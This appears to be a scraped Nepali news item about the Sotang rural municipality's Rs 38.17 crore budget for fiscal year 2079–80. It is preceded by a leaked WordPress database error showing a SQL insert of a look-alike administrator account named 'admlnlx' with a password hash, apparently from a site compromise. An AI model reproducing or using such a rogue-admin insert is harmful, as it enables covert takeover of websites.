WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BnJnlroVq5wvS6Y1i0EHHcFRZpMfIM.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 09:52:54', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । सोलुखुम्बुको सोताङ गाउँपालिकाले आगामी आर्थिक बर्ष २०७९–८० का लागि ३८ करोड १६ लाख ६५ हजारको बजेट बिनियोजन भएको छ ।
असार १० गते बसेको गाउँसभाले संघीय सरकारको सशर्तअनुदान १४ करोड ४७ लाख, राजस्व बाँडफाँड ५ करोड ९८ लाख १६ हजार र समानिकरण अनुदान ९ करोड ४७ लाख बार्षिक बजेटमा समाबेश भएको छ ।
प्रदेश सरकारको सशर्त अनुदान एक लाख २३ हजार, समानिकरण अनुदान ४९ लाख ८२ हजार, समपुरक अनुदान एक करोड, राजस्व बाँडफाँडको १३ लाख ४४ हजार र आन्तरिक आम्दानी ५० हजार गरि ३८ करोड १६ लाख ६५ हजारको बजेट ल्याएको छ।